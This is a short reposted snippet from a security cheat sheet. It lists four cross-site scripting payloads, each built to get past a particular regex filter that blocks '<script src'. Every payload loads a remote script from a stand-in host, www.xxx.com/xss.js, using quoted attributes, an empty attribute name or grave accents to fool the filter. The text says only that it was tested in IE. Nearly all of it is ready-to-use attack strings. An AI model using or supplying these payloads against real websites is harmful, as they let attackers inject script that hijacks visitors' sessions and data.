1. This was tested in IE; your mileage may vary. For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of the regex filter "/<script[^>]+src/i":
Code: <SCRIPT a=">" SRC="http://www.xxx.com/xss.js"></SCRIPT>
2. For performing XSS on sites that allow "<SCRIPT>" but don't allow "<script src..." by way of the regex filter "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i":
Code: <SCRIPT =">" SRC="http://www.xxx.com/xss.js"></SCRIPT>
3. Another XSS to evade the same filter, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i":
Code: <SCRIPT a=">" '' SRC="http://www.xxx.com/xss.js"></SCRIPT>
4. And one last XSS attack to evade "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i", using grave accents:
Code: <SCRIPT a=`>` SRC="www.xxx.com/xss.js"></SCRIPT>
Reposted from: https://blog.51cto.com/whitehat/821493